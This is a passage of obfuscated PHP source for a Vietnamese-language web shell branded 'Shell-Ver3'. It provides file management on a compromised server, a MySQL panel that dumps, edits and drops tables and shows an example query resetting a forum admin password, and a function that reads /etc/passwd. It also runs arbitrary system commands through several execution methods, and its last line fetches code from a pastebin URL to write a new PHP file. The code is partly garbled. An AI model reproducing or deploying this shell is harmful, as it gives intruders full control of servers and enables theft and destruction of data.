  1193. a Th&#432;
  1194. M&#7909;
  1195. c".${dirdb}["filename"]." ? \\n\\nS&#7869;
  1196. X&#243;
  1197. a T&#7845;
  1198. t C&#7843;
  1199. C&#225;
  1200. c File C&#243;
  1201. Trong Th&#432;
  1202. M&#7909;
  1203. c N&#224;
  1204. y.')" title=\"delete folders">X&#243;
  1205. a Th&#432;
  1206. M&#7909;
  1207. c</a> | <a href="javascript:rename('".${"dirdb"}["server_link"]."');
  1208. " title="Rename folder\">&#272;
  1209. &#7893;
  1210. i T&#234;
  1211. n Th&#432;
  1212. M&#7909;
  1213. c</a></td>");
  1214. p("</tr>");
  1215. ${dir_i}++;
  1216. }else{if(${dirdb}["filename"]==".."){p("<tr class=fout>");
  1217. p("<td align=\"center\"> <font face=\"wingdings\" size="4\">7</font></td><td nowrap colspan="5"><a href="javascript:godir('".getUpPath(${"nowpath"})."');
  1218. " title="Parent Directory">L&#234;
  1219. n Tr&#234;
  1220. n</a> |</td>");
  1221. p("</tr>");
  1222. }}}p("<tr bgcolor="Green1" stlye="border-top:1px solid gray;
  1223. border-bottom:1px solid gray;
  1224. \"><td colspan=\"6\" height=\"5\"></td></tr>");
  1225. p("<form id="filelist" name=\"filelist\" action="".${self}."\" method=\"post\">");
  1226. makehide("action","file");
  1227. makehide("thefile");
  1228. makehide("doing");
  1229. makehide("dir",${nowpath});
  1230. ${file_i}="0";
  1231. foreach(${filedata} as${"key"}=>${"filedb"}){if(${filedb}["filename"]!=".."&&${filedb}["filename"]!="."){;
  1232. ${fileurl}=str_replace(SA_ROOT,"",${filedb}["server_link"]);
  1233. ${"thisbg"}=bg();
  1234. p("<tr class=\"fout\" onmouseover="this.className=\focus\\;
  1235. " onmouseout="this.className=\fout\;
  1236. ">");
  1237. p("<td width=\"2%" nowrap><input type="checkbox\" title="Ch&#7885;
  1238. n/Selected\" value=\"1\" name=\"dl[".${filedb}["server_link"]."]"></td>");
  1239. p("<td><a href=\"".${fileurl}."\" target="_blank\" title=\"File\">".${filedb}["filename"]."</a></td>");
  1240. p("<td nowrap>".${"filedb"}["mtime"]."</td>");
  1241. p("<td nowrap>".${"filedb"}["size"]."</td>");
  1242. p("<td nowrap>");
  1243. p("<a href=\"javascript:fileperm('".${"filedb"}["server_link"]."');
  1244. " title=\"Chmod\">".${"filedb"}["filechmod"]."</a> / ");
  1245. p("<a href=\"javascript:fileperm('".${filedb}["server_link"]."');
  1246. " title=\"Quy&#7873;
  1247. n/Permissions\">".${filedb}["fileperm"]."</a>".${filedb}["fileowner"]."</td>");
  1248. p("<td nowrap>");
  1249. p("<a href="javascript:dofile('downfile','".${filedb}["server_link"]."');
  1250. " title=\"Download\">T&#7843;
  1251. i Xu&#7889;
  1252. ng</a> | ");
  1253. p("<a href=\"javascript:copyfile('".${filedb}["server_link"]."');
  1254. " title=\"Copy File\">Sao Ch&#233;
  1255. p</a> | ");
  1256. p("<a href=\"javascript:opfile('editfile','".${filedb}["server_link"]."','".${"filedb"}["dirlink"]."');
  1257. \" title="Edit file\">S&#7917;
  1258. a File</a> | ");
  1259. p("<a href=\"javascript:rename('".${"filedb"}["server_link"]."');
  1260. " title="Rename">&#272;
  1261. &#7893;
  1262. i T&#234;
  1263. n</a> | ");
  1264. p("<a href=\"javascript:opfile('newtime','".${filedb}["server_link"]."','".${filedb}["dirlink"]."');
  1265. \" title="Time\">Th&#7901;
  1266. i Gian</a>");
  1267. p("</td></tr>");
  1268. ${"file_i"}++;
  1269. }}p("<tr class=\"fout1"><td align="center\"><input name="chkall\" value="on\" type=\"checkbox\" onclick="CheckAll(this.form)\" /></td><td><a href=\"javascript:dofile('downrar');
  1270. \" title="Download selected items\">T&#7843;
  1271. i Xu&#7889;
  1272. ng</a> - <a href=\"javascript:dofile('delfiles');
  1273. " title=\"Delete selected items">X&#243;
  1274. a File </a>|</td> <td colspan="4\" align="right"> <a style="color:#FFF500;
  1275. " href="http://whois.domaintools.com/" target=\"_blank" title="http://whois.domaintools.com/"><b>Check Info Web </b></a> | Copyright (c) ".date("Y")." Shell-Ver3 <a style=\"color:#FFF500;
  1276. " href=\"https://www.facebook.com/Party.Marion002" target=\"_blank\" title=\"Facebook Marion001\"><b>#Marion001</b></a>| ( Th&#7901;
  1277. i Gian: ".date("H:i:s - d/m/Y")." ) | ( ".${"dir_i"}." Th&#432;
  1278. M&#7909;
  1279. c / ".${file_i}." File )</td></tr>");
  1280. p("</form></table>");
  1281. }echo "<script type="text/javascript\">\nfunction mysqlfile(doing){if(!doing) return;
  1282. \n\$('doing').value=doing;
  1283. \$('mysqlfile').dbhost.value=\$('dbinfo').dbhost.value;
  1284. \$('mysqlfile').dbport.value=\$('dbinfo').dbport.value;
  1285. \$('mysqlfile').dbuser.value=\$('dbinfo').dbuser.value;
  1286. \$('mysqlfile').dbpass.value=\$('dbinfo').dbpass.value;
  1287. \$('mysqlfile').dbname.value=\$('dbinfo').dbname.value;
  1288. \$('mysqlfile').charset.value=\$('dbinfo').charset.value;
  1289. \$('mysqlfile').submit();
  1290. }\n</script>";
  1291. if(${"action"}=="sqladmin"){$xlvvlcas="update";
  1292. !${dbhost}&&${"dbhost"}="localhost";
  1293. !${dbuser}&&${dbuser}="Marion001";
  1294. !${dbport}&&${"dbport"}="3306";
  1295. ${dbform}="<input type=\"hidden\" id="connect" name=\"connect" value="1" />";
  1296. if(isset(${dbhost})){${dbform}.="<input type=\"hidden" id="dbhost\" name="dbhost" value="$dbhost" />\n";
  1297. }if(isset(${"dbuser"})){$xuizdf="dbform";
  1298. ${$xuizdf}.="<input type=\"hidden" id="dbuser\" name=\"dbuser" value="$dbuser" />\n";
  1299. }if(isset(${"dbpass"})){${dbform}.="<input type="hidden" id=\"dbpass" name=\"dbpass" value="$dbpass\" />\n";
  1300. }if(isset(${dbport})){;
  1301. ${dbform}.="<input type="hidden\" id=\"dbport" name=\"dbport" value="$dbport" />\n";
  1302. }if(isset(${dbname})){$ufjohemovddp="dbform";
  1303. ${$ufjohemovddp}.="<input type=\"hidden\" id=\"dbname\" name=\"dbname" value="$dbname" />\n";
  1304. }if(isset(${"charset"})){${dbform}.="<input type=\"hidden\" id="charset" name=\"charset\" value="$charset" />\n";
  1305. }if(${doing}=="backupmysql"&&${saveasfile}){$xjfjfwu="table";
  1306. if(!${$xjfjfwu}){m("H&#227;
  1307. y Ch&#7885;
  1308. n M&#7897;
  1309. t Table");
  1310. }else{$ckfehpdehpg="dbname";
  1311. dbconn(${dbhost},${dbuser},${dbpass},${$ckfehpdehpg},${charset},${dbport});
  1312. ${table}=array_flip(${table});
  1313. ${fp}=@fopen(${path},"w");
  1314. if(${fp}){$uhculvxkw="result";
  1315. ${result}=q("SHOW tables");
  1316. if(!${result})p("<h2>".mysql_error()."</h2>");
  1317. ${mysqldata}="";
  1318. while(${currow}=mysql_fetch_array(${$uhculvxkw})){$zwleulrdddb="table";
  1319. if(isset(${$zwleulrdddb}[${currow}[0]])){;
  1320. sqldumptable(${"currow"}[0],${fp});
  1321. }}fclose(${"fp"});
  1322. ${fileurl}=str_replace(SA_ROOT,"",${"path"});
  1323. m("C&#417;
  1324. S&#7903;
  1325. D&#7919;
  1326. Li&#7879;
  1327. u &#272;
  1328. &#432;
  1329. &#7907;
  1330. c L&#432;
  1331. u Th&#224;
  1332. nh C&#244;
  1333. ng V&#224;
  1334. o <br/><a href=\"".${fileurl}."\" target=\"_blank\">".${path}."</a>");
  1335. mysql_close();
  1336. }else{m("Sao L&#432;
  1337. u Th&#7845;
  1338. t B&#7841;
  1339. i");
  1340. }}}if(${insert}&&${insertsql}){;
  1341. ${keystr}=${valstr}=${tmp}="";
  1342. foreach(${insertsql} as${key}=>${val}){if(${val}){$fvbcsjvsuue="tmp";
  1343. ${keystr}.=${tmp}.${key};
  1344. ${valstr}.=${$fvbcsjvsuue}."'".addslashes(${val})."'";
  1345. ${tmp}=",";
  1346. }}if(${keystr}&&${valstr}){;
  1347. dbconn(${dbhost},${dbuser},${dbpass},${"dbname"},${charset},${dbport});
  1348. m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)")?"Ch&#232;
  1349. n M&#7899;
  1350. i Th&#224;
  1351. nh C&#244;
  1352. ng":mysql_error());
  1353. }}if(${$xlvvlcas}&&${"insertsql"}&&${base64}){$djbdahpuxs="val";
  1354. ${valstr}=${tmp}="";
  1355. foreach(${insertsql} as${key}=>${$djbdahpuxs}){$btzbor="tmp";
  1356. ${"valstr"}.=${$btzbor}.${"key"}."='".addslashes(${val})."'";
  1357. ${tmp}=",";
  1358. }if(${valstr}){$hqtpltcs="where";
  1359. ${$hqtpltcs}=base64_decode(${"base64"});
  1360. dbconn(${dbhost},${dbuser},${dbpass},${dbname},${"charset"},${"dbport"});
  1361. m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1")?"&#272;
  1362. &#227;
  1363. L&#432;
  1364. u C&#7853;
  1365. p Nh&#7853;
  1366. t":mysql_error());
  1367. }}if(${doing}=="del"&&${base64}){$qvfolgtmotnt="dbport";
  1368. ${where}=base64_decode(${base64});
  1369. ${delete_sql}="DELETE FROM $tablename WHERE $where";
  1370. dbconn(${dbhost},${"dbuser"},${dbpass},${dbname},${charset},${$qvfolgtmotnt});
  1371. m(q("DELETE FROM $tablename WHERE $where")?"X&#243;
  1372. a Th&#224;
  1373. nh C&#244;
  1374. ng":mysql_error());
  1375. }if(${tablename}&&${doing}=="drop"){;
  1376. dbconn(${dbhost},${"dbuser"},${dbpass},${dbname},${charset},${dbport});
  1377. if(q("DROP TABLE $tablename")){$lkotfhzjejg="tablename";
  1378. m("X&#243;
  1379. a Table Th&#224;
  1380. nh C&#244;
  1381. ng");
  1382. ${$lkotfhzjejg}="";
  1383. }else{m(mysql_error());
  1384. }}${charsets}=array(""=>"Default","gbk"=>"GBK","big5"=>"Big5","utf8"=>"UTF-8","latin1"=>"Latin1");
  1385. formhead(array("title"=>"MYSQL Qu&#7843;
  1386. n L&#253;
  1387. "));
  1388. makehide("action","sqladmin");
  1389. p("<p>");
  1390. p("DBHost:");
  1391. makeinput(array("name"=>"dbhost","size"=>20,"value"=>${dbhost}));
  1392. p(":");
  1393. makeinput(array("name"=>"dbport","size"=>4,"value"=>${dbport}));
  1394. p(" DBUser: ");
  1395. makeinput(array("name"=>"dbuser","size"=>15,"value"=>${dbuser}));
  1396. p(" DBPass: ");
  1397. makeinput(array("name"=>"dbpass","size"=>15,"value"=>${"dbpass"}));
  1398. p(" DBCharset: ");
  1399. makeselect(array("name"=>"charset","option"=>${charsets},"selected"=>${charset}));
  1400. makeinput(array("name"=>"connect","value"=>"Marion001","type"=>"submit","class"=>"bt"));
  1401. p("</p>");
  1402. formfoot();
  1403. echo "<script type=\"text/javascript\">\nfunction editrecord(action, base64, tablename){if (action == 'del') {if (!confirm('Is or isn\'t deletion record?')) return;
  1404. }\n\$('recordlist').doing.value=action;
  1405. \$('recordlist').base64.value=base64;
  1406. \$('recordlist').tablename.value=tablename;
  1407. \$('recordlist').submit();
  1408. \n}function moddbname(dbname) {if(!dbname) return;
  1409. \$('setdbname').dbname.value=dbname;
  1410. \$('setdbname').submit();
  1411. \n}function settable(tablename,doing,page) {if(!tablename) return;
  1412. \nif (doing) {\$('settable').doing.value=doing;
  1413. \n}if (page) {\$('settable').page.value=page;
  1414. }\$('settable').tablename.value=tablename;
  1415. \$('settable').submit();
  1416. }\n</script>";
  1417. formhead(array("name"=>"recordlist"));
  1418. makehide("doing");
  1419. makehide("action","sqladmin");
  1420. makehide("base64");
  1421. makehide("tablename");
  1422. p(${"dbform"});
  1423. formfoot();
  1424. formhead(array("name"=>"setdbname"));
  1425. makehide("action","sqladmin");
  1426. p(${dbform});
  1427. if(!${dbname}){makehide("dbname");
  1428. }formfoot();
  1429. formhead(array("name"=>"settable"));
  1430. makehide("action","sqladmin");
  1431. p(${dbform});
  1432. makehide("tablename");
  1433. makehide("page",${page});
  1434. makehide("doing");
  1435. formfoot();
  1436. ${cachetables}=array();
  1437. ${pagenum}=30;
  1438. ${page}=intval(${page});
  1439. if(${"page"}){$jcqssbfaa="start_limit";
  1440. ${$jcqssbfaa}=(${page}-1)*${"pagenum"};
  1441. }else{${start_limit}=0;
  1442. ${page}=1;
  1443. }if(isset(${"dbhost"})&&isset(${dbuser})&&isset(${"dbpass"})&&isset(${connect})){;
  1444. dbconn(${dbhost},${dbuser},${dbpass},${dbname},${charset},${dbport});
  1445. ${mysqlver}=mysql_get_server_info();
  1446. p("<p>MySQL ".${mysqlver}." ch&#7841;
  1447. y Trong ".${"dbhost"}." Nh&#432;
  1448. ".${dbuser}."@".${"dbhost"}."</p>");
  1449. ${highver}=${mysqlver}>"4.1"?1:0;
  1450. ${query}=q("SHOW DATABASES");
  1451. ${dbs}=array();
  1452. ${dbs}[]="Ch&#7885;
  1453. n M&#7897;
  1454. t C&#417;
  1455. S&#7903;
  1456. D&#7919;
  1457. Li&#7879;
  1458. u";
  1459. while(${db}=mysql_fetch_array(${query})){${dbs}[${db}["Database"]]=${db}["Database"];
  1460. }makeselect(array("title"=>"H&#227;
  1461. y Ch&#7885;
  1462. n M&#7897;
  1463. t Database:","name"=>"db[]","option"=>${dbs},"selected"=>${dbname},"onchange"=>"moddbname(this.options[this.selectedIndex].value)","newline"=>1));
  1464. ${"tabledb"}=array();
  1465. if(${dbname}){$dclttgru="tablename";
  1466. p("<p>");
  1467. p("Dababase Hi&#7879;
  1468. n T&#7841;
  1469. i: <a href=\"javascript:moddbname('".${dbname}."');
  1470. \">".${dbname}."</a>");
  1471. if(${tablename}){;
  1472. p(" | Table Hi&#7879;
  1473. n T&#7841;
  1474. i <a href="javascript:settable('".${tablename}."');
  1475. \">".${tablename}."</a> [ <a href=\"javascript:settable('".${tablename}."', 'insert');
  1476. ">Ch&#232;
  1477. n</a> | <a href="javascript:settable('".${"tablename"}."', 'structure');
  1478. ">C&#417;
  1479. C&#7845;
  1480. u</a> | <a href="javascript:settable('".${"tablename"}."', 'drop');
  1481. \">X&#243;
  1482. a</a> ]");
  1483. }p("</p>");
  1484. mysql_select_db(${dbname});
  1485. ${"getnumsql"}="";
  1486. ${runquery}=0;
  1487. if(${sql_query}){;
  1488. ${runquery}=1;
  1489. }${allowedit}=0;
  1490. if(${tablename}&&!${sql_query}){$rdxxlbckdpf="sql_query";
  1491. ${$rdxxlbckdpf}="SELECT * FROM $tablename";
  1492. ${getnumsql}=${"sql_query"};
  1493. ${sql_query}=${sql_query}." LIMIT $start_limit, $pagenum";
  1494. ${allowedit}=1;
  1495. }p("<form action=\"".${self}."" method="POST">");
  1496. p("<p><table width=\"200" border=\"0\" cellpadding="0" cellspacing="0\"><tr><td colspan=\"2\">Ch&#7841;
  1497. y Truy V&#7845;
  1498. n SQL/Tr&#234;
  1499. n C&#417;
  1500. S&#7903;
  1501. D&#7919;
  1502. Li&#7879;
  1503. u <font color=red><b>".${"dbname"}."</font></b>:<BR>V&#237;
  1504. D&#7909;
  1505. VBB M&#7853;
  1506. t Kh&#7849;
  1507. u: <font color=red>Marion001</font><BR><font color=yellow>UPDATE `user` SET `password` = '20ec508bb4a6c454615f3414f6b47376', salt = 'p5T' WHERE `userid` = '1' </font>\n</td></tr><tr><td><textarea name=\"sql_query\" class="area" style="width:600px;
  1508. height:50px;
  1509. overflow:auto;
  1510. ">".htmlspecialchars(${sql_query},ENT_QUOTES)."</textarea></td><td style=\"padding:0 5px;
  1511. "><input class=\"bt\" style=\"height:50px;
  1512. \" name=\"submit\" type="submit\" value=\"Ch&#7841;
  1513. y Truy V&#7845;
  1514. n\" /></td></tr></table></p>");
  1515. makehide("tablename",${$dclttgru});
  1516. makehide("action","sqladmin");
  1517. p(${dbform});
  1518. p("</form>");
  1519. if(${tablename}||(${run}&&${"sql_query"})){$ixjutcopjv="doing";
  1520. if(${$ixjutcopjv}=="structure"){$vhosxytpy="rowdb";
  1521. ${result}=q("SHOW COLUMNS FROM $tablename");
  1522. ${"rowdb"}=array();
  1523. while(${row}=mysql_fetch_array(${result})){$utkhglix="row";
  1524. ${rowdb}[]=${$utkhglix};
  1525. }p("<table border="0" cellpadding=\"3\" cellspacing=\"0\">");
  1526. p("<tr class="head">");
  1527. p("<td>D&#242;
  1528. ng</td>");
  1529. p("<td>Lo&#7841;
  1530. i</td>");
  1531. p("<td>Null</td>");
  1532. p("<td>Key</td>");
  1533. p("<td>Default</td>");
  1534. p("<td>Extra</td>");
  1535. p("</tr>");
  1536. foreach(${$vhosxytpy} as${row}){${thisbg}=bg();
  1537. p("<tr class="fout\" onmouseover="this.className='focus';
  1538. \" onmouseout="this.className='fout';
  1539. ">");
  1540. p("<td>".${row}["Field"]."</td>");
  1541. p("<td>".${row}["Type"]."</td>");
  1542. p("<td>".${"row"}["Null"]."&nbsp;
  1543. </td>");
  1544. p("<td>".${row}["Key"]."&nbsp;
  1545. </td>");
  1546. p("<td>".${"row"}["Default"]."&nbsp;
  1547. </td>");
  1548. p("<td>".${row}["Extra"]."&nbsp;
  1549. </td>");
  1550. p("</tr>");
  1551. }tbfoot();
  1552. }elseif(${doing}=="insert"||${doing}=="edit"){$eejgyhrx="row";
  1553. ${result}=q("SHOW COLUMNS FROM ".${tablename});
  1554. while(${$eejgyhrx}=mysql_fetch_array(${"result"})){${rowdb}[]=${row};
  1555. }${rs}=array();
  1556. if(${doing}=="insert"){;
  1557. p("<h2>Ch&#232;
  1558. n D&#242;
  1559. ng M&#7899;
  1560. i Trong ".${tablename}." B&#7843;
  1561. ng</h2>");
  1562. }else{$rkqbxvsyy="result";
  1563. p("<h2>C&#7853;
  1564. p Nh&#7853;
  1565. t H&#7891;
  1566. S&#417;
  1567. Trong ".${tablename}." table &raquo;
  1568. </h2>");
  1569. ${"where"}=base64_decode(${base64});
  1570. ${result}=q("SELECT * FROM $tablename WHERE $where LIMIT 1");
  1571. ${rs}=mysql_fetch_array(${$rkqbxvsyy});
  1572. }p("<form method=\"post" action="".${self}."\">");
  1573. p(${dbform});
  1574. makehide("action","sqladmin");
  1575. makehide("tablename",${"tablename"});
  1576. p("<table border="0\" cellpadding=\"3" cellspacing="0">");
  1577. foreach(${rowdb} as${"row"}){;
  1578. if(${rs}[${row}["Field"]]){${value}=htmlspecialchars(${rs}[${row}["Field"]]);
  1579. }else{${value}="";
  1580. }$mflvlgzq="value";
  1581. ${thisbg}=bg();
  1582. p("<tr class=\"fout\" onmouseover=\"this.className='focus';
  1583. " onmouseout=\"this.className='fout';
  1584. \">");
  1585. p("<td><b>".${row}["Field"]."</b><br />".${row}["Type"]."</td><td><textarea class=\"area\" name="insertsql[".${row}["Field"]."]" style="width:500px;
  1586. height:60px;
  1587. overflow:auto;
  1588. \">".${$mflvlgzq}."</textarea></td></tr>");
  1589. }if(${"doing"}=="insert"){p("<tr class="fout\"><td colspan="2\"><input class=\"bt\" type="submit\" name=\"insert\" value=\"Insert" /></td></tr>");
  1590. }else{p("<tr class="fout\"><td colspan="2"><input class=\"bt\" type=\"submit" name="update\" value=\"Update" /></td></tr>");
  1591. makehide("base64",${base64});
  1592. }p("</table></form>");
  1593. }else{$gqkvgylm="sql_query";
  1594. ${querys}=@explode(";
  1595. ",${$gqkvgylm});
  1596. foreach(${querys} as${num}=>${query}){if(${query}){;
  1597. p("<p><b>Ch&#7841;
  1598. y Truy V&#7845;
  1599. n-#{$num} :> ".htmlspecialchars(${query},ENT_QUOTES)."</b></p>");
  1600. switch(qy(${query})){case 0:p("<h2>Error : ".mysql_error()."</h2>");
  1601. break;
  1602. case 1:if(strtolower(substr(${query},0,13))=="select * from"){${allowedit}=1;
  1603. }if(${getnumsql}){$deyqsix="multipage";
  1604. ${tatol}=mysql_num_rows(q(${getnumsql}));
  1605. ${$deyqsix}=multi(${tatol},${pagenum},${page},${tablename});
  1606. }if(!${tablename}){$tjnsku="sql_line";
  1607. ${sql_line}=str_replace(array("\r","\n","\t"),array(" "," "," "),trim(htmlspecialchars(${query})));
  1608. ${$tjnsku}=preg_replace("/\\/\*[^(\*\\/)]*\*\\//i"," ",${sql_line});
  1609. preg_match_all("/from\\s+`{0,1}([\\w]+)`{0,1}\s+/i",${sql_line},${matches});
  1610. ${tablename}=${matches}[1][0];
  1611. }${result}=q(${query});
  1612. p(${"multipage"});
  1613. p("<table border="0" cellpadding="3" cellspacing=\"0">");
  1614. p("<tr class=\"head\">");
  1615. if(${allowedit})p("<td>C&#224;
  1616. i &#272;
  1617. &#7863;
  1618. t</td>");
  1619. ${"fieldnum"}=@mysql_num_fields(${result});
  1620. for(${"i"}=0;
  1621. ${i}<${fieldnum};
  1622. ${i}++){$jwbgnvocm="i";
  1623. ${name}=@mysql_field_name(${result},${$jwbgnvocm});
  1624. ${"type"}=@mysql_field_type(${result},${i});
  1625. ${len}=@mysql_field_len(${result},${i});
  1626. p("<td nowrap>$name<br><span>$type($len)</span></td>");
  1627. }p("</tr>");
  1628. while(${mn}=@mysql_fetch_assoc(${result})){;
  1629. ${thisbg}=bg();
  1630. p("<tr class=\"fout\" onmouseover="this.className='focus';
  1631. \" onmouseout="this.className='fout';
  1632. \">");
  1633. ${where}=${tmp}=${b1}="";
  1634. foreach(${mn} as${key}=>${inside}){if(${inside}){${where}.=${tmp}.${key}."='".addslashes(${inside})."'";
  1635. ${tmp}=" AND ";
  1636. }${b1}.="<td nowrap>".html_clean(${inside})."&nbsp;
  1637. </td>";
  1638. }$csbtkskkdee="b1";
  1639. ${"where"}=base64_encode(${"where"});
  1640. if(${"allowedit"})p("<td nowrap><a href=\"javascript:editrecord('edit', '".${where}."', '".${tablename}."');
  1641. \">S&#7917;
  1642. a</a> | <a href=\"javascript:editrecord('del', '".${where}."', '".${tablename}."');
  1643. ">X&#243;
  1644. a</a></td>");
  1645. p(${b1});
  1646. p("</tr>");
  1647. unset(${$csbtkskkdee});
  1648. }tbfoot();
  1649. p(${"multipage"});
  1650. break;
  1651. case 2:${ar}=mysql_affected_rows();
  1652. p("<h2>affected rows : <b>".${"ar"}."</b></h2>");
  1653. break;
  1654. }}}}}else{$fjcvhycd="table";
  1655. ${query}=q("SHOW TABLE STATUS");
  1656. ${table_num}=${table_rows}=${data_size}=0;
  1657. ${tabledb}=array();
  1658. while(${$fjcvhycd}=mysql_fetch_array(${query})){$lghtqed="table";
  1659. ${data_size}=${data_size}+${table}["Data_length"];
  1660. ${table_rows}=${table_rows}+${$lghtqed}["Rows"];
  1661. ${"table"}["Data_length"]=sizecount(${table}["Data_length"]);
  1662. ${table_num}++;
  1663. ${tabledb}[]=${table};
  1664. }${"data_size"}=sizecount(${data_size});
  1665. unset(${table});
  1666. p("<table border=\"0\" cellpadding="0\" cellspacing=\"0">");
  1667. p("<form action="".${self}."\" method=\"POST\">");
  1668. makehide("action","sqladmin");
  1669. p(${dbform});
  1670. p("<tr class=\"head\">");
  1671. p("<td width=\"2%" align=\"center"><input name="chkall" value="on\" type="checkbox\" onclick="CheckAll(this.form)" /></td>");
  1672. p("<td>T&#234;
  1673. n</td>");
  1674. p("<td>H&#224;
  1675. ng</td>");
  1676. p("<td>Dung L&#432;
  1677. &#7907;
  1678. ng</td>");
  1679. p("<td>Th&#7901;
  1680. i Gian T&#7841;
  1681. o</td>");
  1682. p("<td>Th&#7901;
  1683. i Gian C&#7853;
  1684. p Nh&#7853;
  1685. t</td>");
  1686. if(${"highver"}){p("<td>H&#7879;
  1687. Qu&#7843;
  1688. n Tr&#7883;
  1689. CSDL</td>");
  1690. p("<td>&#272;
  1691. &#7889;
  1692. i Chi&#7871;
  1693. u</td>");
  1694. }p("</tr>");
  1695. foreach(${"tabledb"} as${key}=>${table}){;
  1696. ${thisbg}=bg();
  1697. p("<tr class="fout" onmouseover=\"this.className='focus';
  1698. " onmouseout="this.className='fout';
  1699. \">");
  1700. p("<td align="center" width="2%"><input type="checkbox\" name=\"table[]" value=\"".${table}["Name"]."" /></td>");
  1701. p("<td><a href="javascript:settable('".${table}["Name"]."');
  1702. ">".${table}["Name"]."</a> [ <a href=\"javascript:settable('".${table}["Name"]."', 'insert');
  1703. ">Ch&#232;
  1704. n</a> | <a href="javascript:settable('".${"table"}["Name"]."', 'structure');
  1705. \">C&#417;
  1706. C&#7845;
  1707. u</a> | <a href="javascript:settable('".${"table"}["Name"]."', 'drop');
  1708. ">X&#243;
  1709. a</a> ]</td>");
  1710. p("<td>".${"table"}["Rows"]."</td>");
  1711. p("<td>".${table}["Data_length"]."</td>");
  1712. p("<td>".${"table"}["Create_time"]."</td>");
  1713. p("<td>".${table}["Update_time"]."</td>");
  1714. if(${p("<td>".${table}["Engine"]."</td>");
  1715. p("<td>".${${"GLOBALS"}["qnqkxfmq"]}["Collation"]."</td>");
  1716. }p("</tr>");
  1717. }p("<tr class=fout>");
  1718. p("<td>&nbsp;
  1719. </td>");
  1720. p("<td>T&#7893;
  1721. ng S&#7889;
  1722. Table ".${"table_num"}."</td>");
  1723. p("<td>".${table_rows}."</td>");
  1724. p("<td>".${data_size}."</td>");
  1725. p("<td colspan=\"".(${"highver"}?4:2)."">&nbsp;
  1726. </td>");
  1727. p("</tr>");
  1728. p("<tr class=\"fout\"><td colspan="".(${"highver"}?8:6).""><input name="saveasfile" value="1\" type=\"checkbox" /> L&#432;
  1729. u File <input class=\"input" name="path\" value=\"".SA_ROOT.$_SERVER["HTTP_HOST"]."_MySQL.sql" type=\"text\" size="60\" /> <input class="bt\" type=\"submit" name=\"downrar" value=\"Marion001" /></td></tr>");
  1730. makehide("doing","backupmysql");
  1731. formfoot();
  1732. p("</table>");
  1733. fr(${query});
  1734. }}}tbfoot();
  1735. @mysql_close();
  1736. }elseif(${"action"}=="etcpwd"){formhead(array("title"=>"Get /etc/passwd"));
  1737. makehide("action","etcpwd");
  1738. makehide("dir",${nowpath});
  1739. ${i}=0;
  1740. echo"<p><textarea class=\\"area\\" id=\\"phpcodexxx\\" name=\\\"phpcodexxx\\" style=\"margin: 0px;
  1741. width: 100%;
  1742. height: 150px;
  1743. ">";
  1744. while(${"i"}<60000){${line}=posix_getpwuid(${i});
  1745. if(!empty(${line})){;
  1746. while(list(${key},${vba_etcpwd})=each(${line})){echo"".${vba_etcpwd}."\n";
  1747. break;
  1748. }}${"i"}++;
  1749. }echo"</textarea></p>";
  1750. formfoot();
  1751. echo"<b>cat /etc/passwd >></b><textarea style='margin: 0px;
  1752. width: 100%;
  1753. height: 150px;
  1754. '>";
  1755. ${cmdloai2}="cat /etc/passwd";
  1756. system(${cmdloai2});
  1757. echo"</textarea></p>";
  1758. }elseif(${"action"}=="command"){if(IS_WIN&&IS_COM){if(${program}&&${parameter}){$iyyzbcumxqvj="program";
  1759. ${shell}=new COM("Shell.Application");
  1760. ${a}=$shell->ShellExecute(${$iyyzbcumxqvj},${parameter});
  1761. m("Ch&#7841;
  1762. y L&#7879;
  1763. nh ".(!${a}?"Th&#224;
  1764. nh C&#244;
  1765. ng":"Th&#7845;
  1766. t B&#7841;
  1767. i"));
  1768. }!${program}&&${program}="c:\\indows\ystem32\md.exe";
  1769. !${parameter}&&${parameter}="/c net start > ".SA_ROOT."log.txt";
  1770. formhead(array("title"=>"Th&#7921;
  1771. c Hi&#7879;
  1772. n Tr&#432;
  1773. &#417;
  1774. ng Tr&#236;
  1775. nh"));
  1776. makehide("action","shell");
  1777. makeinput(array("title"=>"Program","name"=>"program","value"=>${program},"newline"=>1));
  1778. p("<p>");
  1779. makeinput(array("title"=>"Parameter","name"=>"parameter","value"=>${parameter}));
  1780. makeinput(array("name"=>"submit","class"=>"bt","type"=>"submit","value"=>"Execute"));
  1781. p("</p>");
  1782. formfoot();
  1783. }formhead(array("title"=>"L&#7879;
  1784. nh Th&#7921;
  1785. c hi&#7879;
  1786. n"));
  1787. makehide("action","shell");
  1788. if(IS_WIN&&IS_COM){${execfuncdb}=array("phpfunc"=>"phpfunc","wscript"=>"wscript","proc_open"=>"proc_open");
  1789. makeselect(array("title"=>"Use:","name"=>"execfunc","option"=>${execfuncdb},"selected"=>${execfunc},"newline"=>1));
  1790. }p("<p>");
  1791. makeinput(array("title"=>"Command","name"=>"command","value"=>${command}));
  1792. makeinput(array("name"=>"submit","class"=>"bt","type"=>"submit","value"=>"Marion001"));
  1793. p("</p>");
  1794. formfoot();
  1795. if(${command}){$anwlipn="execfunc";
  1796. p("<hr width="100%\" noshade /><pre>");
  1797. if(${$anwlipn}=="wscript"&&IS_WIN&&IS_COM){${wsh}=new COM("WScript.shell");
  1798. ${exec}=$wsh->exec("cmd.exe /c ".${command});
  1799. ${stdout}=$exec->StdOut();
  1800. ${"stroutput"}=$stdout->ReadAll();
  1801. echo${stroutput};
  1802. }elseif(${execfunc}=="proc_open"&&IS_WIN&&IS_COM){;
  1803. ${descriptorspec}=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));
  1804. ${process}=proc_open($_SERVER["COMSPEC"],${descriptorspec},${pipes});
  1805. if(is_resource(${process})){;
  1806. fwrite(${pipes}[0],${"command"}."");
  1807. fwrite(${pipes}[0],"exit");
  1808. fclose(${pipes}[0]);
  1809. while(!feof(${pipes}[1])){$uyewdusdegp="pipes";
  1810. echo fgets(${$uyewdusdegp}[1],1024);
  1811. }fclose(${pipes}[1]);
  1812. while(!feof(${"pipes"}[2])){$mmbkewhfqs="pipes";
  1813. echo fgets(${$mmbkewhfqs}[2],1024);
  1814. }fclose(${pipes}[2]);
  1815. proc_close(${process});
  1816. }}else{$ryccnkgzwujg="command";
  1817. echo(execute(${$ryccnkgzwujg}));
  1818. }p("</pre>");
  1819. }}elseif(${"action"}=="newcommand"){$othqfpomd="newcommand";
  1820. ${"file"}=fopen(${dir}."Command.php","w+");
  1821. ${$othqfpomd}=file_get_contents("http://pastebin.com/raw.php?i=hYj7kBWS");
